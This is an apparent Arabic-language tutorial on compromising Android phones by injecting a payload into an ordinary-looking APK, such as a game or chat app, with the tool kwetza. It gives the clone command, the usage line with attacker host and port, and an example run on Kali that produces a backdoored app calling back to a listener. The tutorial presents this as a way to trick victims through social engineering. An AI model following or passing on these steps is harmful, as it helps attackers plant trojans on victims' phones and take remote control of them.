من أهم الطرق المستخدمة في إختراق هواتف أندرويد، أن يتم تثبيت ملف apk ( تطبيق ) على جهاز الضحية، ويلجئ الهاكرز
لإخفاء هذه التطبيقات ضمن تطبيقات أخرى (الهندسة الإجتماعية)، مثلا تطبيقات ألعاب أو دردشه أو ربح المال وغيرها ..
ومن الأدوات التي تساعدهم في القيام بدمج التطبيقات وإخفائها (الهندسة الإجتماعية) أدة kwetza.
تثبيت أداة kwetza
git clone https://github.com/sensepost/kwetza.git
طريقة إستخدام kwetza
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no
nameOfTheApkToInfect.apk: الملف أو اسم التطبيق الذي تريد عمل حقن له (تطبيق ألعاب...).
root@kali:~/Desktop/kwetza# python kwetza.py testhack.apk 192.168.1.1 444 yes
يتم حفظ الملف الجديد في المسار التالي، وهو بنفس إسم الملف الأصلي قبل الحقن.
/root/Desktop/kwetza/testhack/dist/testhack.apk
